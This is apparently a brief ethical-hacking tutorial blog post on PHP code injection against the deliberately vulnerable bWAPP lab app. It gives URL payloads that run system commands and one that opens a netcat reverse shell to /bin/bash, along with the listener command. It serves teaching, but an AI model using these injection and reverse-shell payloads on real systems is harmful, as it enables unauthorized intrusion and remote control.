Ethical Hacking Playground

hacking is curiosity

PHP Code Injection

Commands

Listen for a connection


nc -lvp 4444

list the files


http://192.168.20.131/bWAPP/phpi.php?message=system('ls')

view the hostname


http://192.168.20.131/bWAPP/phpi.php?message=system('hostname')

Make a connection to the remote host


http://192.168.20.131/bWAPP/phpi.php?message=system('nc -vn 192.168.20.131 4444 -e /bin/bash')

Demonstration

If you have any questions please comment below.

Advertisements

2 min read

How to earn your first bounty in bug bounty hunting

2 months ago krypt0mux

2 min read

Bug bounty

A cross-platform note-taking & target-tracking app for penetration testers.

3 months ago krypt0mux

1 min read

Priceline Open Redirect Hackerone Disclosure

3 months ago krypt0mux

1 min read

Bug bounty

Tube8 Reflected XSS Hackerone Discolosure

4 months ago krypt0mux

%d bloggers like this: